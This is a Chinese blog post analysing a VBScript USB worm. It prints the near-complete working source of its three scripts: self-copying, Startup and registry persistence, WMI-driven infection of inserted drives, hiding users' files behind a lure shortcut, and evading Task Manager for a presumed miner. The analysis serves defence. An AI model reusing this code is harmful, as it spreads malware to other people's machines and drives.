U盘病毒movemenoreg源码解读

作者:Alex Yang 发布时间: 2026-07-02 阅读量:12 评论数:0

U盘作为便携式移动存储设备,具备使用场景广泛、设备插拔频繁、跨设备传输数据的特点,是恶意病毒传播扩散的主要载体之一。各类轻量型脚本病毒依托U盘的传播特性,能够实现无感感染、持久驻留、批量扩散,对个人终端设备及数据安全造成极大威胁。本文所分析的恶意程序为一款基于VBS脚本开发的U盘传播型病毒,该病毒代码体量精简,整体不足三百行,却集成了终端感染、开机自启、U盘监测、跨设备传播、规避查杀等完整恶意功能,结构完整、逻辑清晰。通过对病毒文件结构、感染机制、传播流程及核心代码特征的深度分析,结合脚本残留关键指令特征,可初步判定该病毒配套存在挖矿恶意程序。为明确该病毒的攻击原理、传播路径与潜在危害,本文对其文件构成、双向感染流程及核心恶意特征进行全面拆解分析,为该类U盘脚本病毒的识别、查杀与防御提供参考依据。

一、现象

此病毒侵入 U 盘后,会在 U 盘根目录生成两个系统隐藏文件夹与一个U盘卷标同名快捷方式:两个系统属性隐藏文件夹分别命名为 _WindowsServices。其中_文件夹用于转移存储 U 盘内用户原有全部文件;WindowsServices 文件夹内置三类病毒脚本:movemenoreg.vbsinstaller.vbshelper.vbs。查阅病毒源码可知该目录本应包含第四个程序 WindowsServices.exe,当前样本 U 盘未出现该文件;生成的快捷方式名称与 U 盘原有盘符 / 卷标名称完全一致。

病毒文件列表:

点开快捷方式后可见到U盘内所有的原始文件

WindowsServices目录包含病毒VBS脚本文件

二、源代码解读

2.1 快捷方式文件

快捷方式文件是入口,用来恶意引导用户点击启动病毒的主体文件。快捷方式的目标如下:

%COMSPEC% /C .\WindowsServices\movemenoreg.vbs

其中,%COMSPEC% 是环境变量,指的是 C:\Windows\system32\cmd.exe。这里是用 cmd.exe 打开病毒文件 movemenoreg.vbs

2.2 movemenoreg .vbs 文件内容

'发生错误时,程序将继续执行下一句代码
on error resume next
'定义系统变量
Dim  strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
'获得WScript.Shell
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"




'打开根目录下名为‘_’的目录,是存放用户所有原始文件的目录
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
'VB/VBScript 中,Chr(数字) 用于把 ASCII 码转为对应字符;ASCII 34 对应双引号 ",所以 Chr(34)是双引号"
ws.Run Chr(34) & pfolder & "\_" & Chr(34)

'AppData为用户数据目录,具体位置是C:\Users\用户名\AppData\Roaming
AppData = ws.ExpandEnvironmentStrings("%AppData%")



DestFolder = AppData & Target

'创建目标目录,也就是%AppData%\WindowsServices目录
if (not objws.folderexists(DestFolder)) then
    objws.CreateFolder DestFolder   
    Set objDestFolder = objws.GetFolder(DestFolder)
end if

'将四个病毒文件复制到目标目录并设置系统隐藏属性。
'这种属性,用户使用文件夹选项勾选“显示隐藏文件”,但是不选择“隐藏受保护的操作系统文件(推荐)”时,不可见
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39


sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        '复制文件
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)

        '系统隐藏文件(39表示文件属性为归档、系统、隐藏)
        If not objmove.Attributes AND 39 then 
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if

    end if
end sub




Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
'WinMgmts: 是 VBScript、WMI 脚本里的WMI 专用对象前缀,用于快速连接 Windows WMI 服务;
'Root\CIMv2 是 Windows 默认、最核心的 WMI 命名空间,存放系统硬件、进程、文件、服务、注册表、磁盘等绝大多数系统信息。
'拼接完整:GetObject("WinMgmts:Root\Cimv2"),作用是建立本机 WMI 管理对象。
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'调用WMI管理对象,查找helper.vbs是否已经运行,如果已经运行就退出当前脚本。
For Each objProcess In colProcess
    vaprocess = objProcess.CommandLine
        if instr(vaprocess, "helper.vbs") then
            WScript.quit
        End if
Next

'运行helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)


Set ws = Nothing

2.3 helper .vbs 文件

on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")


nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")


strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
'获得用户启动目录路径
startupPath = ws.SpecialFolders("startup")

miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)

MyScript = "helper.vbs"


While True
    '检查注册表,如果未修改,则修改注册表启动项
    key = Empty
    key = ws.regread (nkey)
    If (not IsEmpty(key)) then

        ws.RegWrite nkey, 2, "REG_BINARY"   
    End if

    If (not objws.fileexists(startupPath & "\helper.lnk")) then
        '在启动目录创建helper.vbs启动快捷方式
        Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
        link.Description = "helper"
        link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
        link.WorkingDirectory = strPath
        link.Save
    End If

    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

    '检查installer.vbs文件是否在执行,如果不在则运行installer.vbs
    call procheck(colProcess, "installer.vbs")

    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
    Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")

    if colProcess.count = 0 And tskProcess.count = 0  then
        '运行WindowsServices.exe
        ws.Run miner, 0

    ElseIf colProcess.count > 0 And tskProcess.count > 0 then

        '如果用户打开了任务管理器,就结束WindowsServices.exe
        For Each objProcess In colProcess
            ws.run "taskkill /PID " & objProcess.ProcessId , 0 
        Next

    end if
    WScript.Sleep 3000
Wend



'---------------------------------------------------------------------------------

sub procheck(checkme, procname)

For Each objProcess In checkme
    vaprocess = objProcess.CommandLine

        if instr(vaprocess, procname) then
            Exit sub
        End if

Next

ws.Run Chr(34) & strPath & procname & Chr(34)

end sub

'--------------------------------------------------------------------------------

2.4 installer .vbs 文件

installer.vbs 文件进行感染新 U盘操作

on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"


'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)




'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'查询硬盘事件
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")


Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")


While True

    '检查helper.vbs是否在执行,如果不在执行,则运行help.vbs
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
    call procheck(colProcess, "helper.vbs")

    '取出下一个事件
    Set objEvent = colEvents.NextEvent



    If objEvent.TargetInstance.DriveType = 2  Then
        If objEvent.Path_.Class = "__InstanceCreationEvent" Then
            '一个新的U盘插入
            device = objEvent.TargetInstance.DeviceID
            devicename = objEvent.TargetInstance.VolumeName
            DestFolder = device & "\WindowsServices"
            DummyFolder = device & "\" & "_"
            '在U盘根目录下创建目的目录(\WindowsServices)
            if (not objws.folderexists(DestFolder)) then
                objws.CreateFolder DestFolder   
                Set objDestFolder = objws.GetFolder(DestFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 39
            end if

            '将四个病毒文件移动到目的目录
            Call moveandhide ("\helper.vbs")
            Call moveandhide ("\installer.vbs")
            Call moveandhide ("\movemenoreg.vbs")
            Call moveandhide ("\WindowsServices.exe")

            '在U盘根目录下创建打开movemenoreg.vbs文件的快捷方式
            if (not objws.fileexists (device & devicename & ".lnk")) then
                Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
                link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
                link.TargetPath = "%COMSPEC%" 
                link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
                link.windowstyle = 7
                link.Save
            End If


            '在U盘根目录下创建名为‘_’的目录并隐藏
            if (not objws.folderexists(DummyFolder)) then
                objws.CreateFolder DummyFolder  
                Set objDestFolder = objws.GetFolder(DummyFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
                End If
            set check = objws.getFolder(device)
            '将用户文件都移动到名为‘_’的目录下
            Call checker(check)

        End If
    End If




Wend





sub checker (path)
    set home = path.Files
    For Each file in home
        Select Case file.Name
            Case devicename & ".lnk"
                'nothings
            Case Else
                objws.MoveFile path & file.Name, DummyFolder & "\"
        End Select

    Next

    set home = path.SubFolders
    For Each home in home
        Select Case home
            Case path & "_"
                'nothings
            Case path & "WindowsServices"
                'nothings
            Case path & "System Volume Information"
                'nothings'
            Case Else
                objws. MoveFolder home, DummyFolder & "\"
        End Select

    Next

end sub


'------------------------------------------------------------


sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)

        If not objmove.Attributes AND 39 then 
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if

    end if
end sub



'------------------------------------------------------------


sub procheck(checkme, procname)

For Each objProcess In checkme
    vaprocess = objProcess.CommandLine

        if instr(vaprocess, procname) then
            Exit sub
        End if

Next
ws.Run Chr(34) & strFolder  & "\" & procname & Chr(34)
end sub

三、工作流程

3.1 U 盘向计算机传播感染流程

已被病毒侵染的 U 盘接入电脑后,若用户双击 U 盘根目录内的同名快捷方式,恶意程序便会触发执行:病毒本体自动拷贝至系统 %AppData%\WindowsServices文件夹,同时写入开机自启配置实现持久驻留。此后该恶意程序会持续监测移动存储设备接入状态,一旦检测到新 U 盘插入,立刻将全套病毒文件复制至该 U 盘完成扩散。

3.2 主机反向感染 U 盘机制

  1. 已被病毒入侵的计算机开机后,恶意程序会随系统自动加载驻留后台。

  2. 当监测到有移动 U 盘接入时,病毒会在该 U 盘根目录创建 _WindowsServices两个隐藏文件夹;
    其一将 U 盘内用户全部原始文件迁移存放至 _目录;
    其二把全套四份恶意程序写入 WindowsServices目录。同时在 U 盘根目录生成快捷方式。

  3. 双击该快捷方式会直接启动恶意脚本 movemenoreg.vbs,完成对 U 盘的完整感染。

四、总结

  • 该 VBS 恶意脚本代码不足三百行,但完整实现主机感染、U 盘传播、对抗查杀等核心恶意功能;

  • 脚本变量命名、功能模块划分规范,编写者具备成熟的 VBS 与恶意程序开发经验。

  • 样本缺失 WindowsServices.exe 文件,无法判定攻击者完整意图,不过结合 helper.vbs 中这段调用该程序的代码特征,可推断其配套程序大概为挖矿程序。

miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)

郑重声明:本文对该病毒源代码进行分析,只为学习和传播知识使用,一切后果与本文作者无关!


评论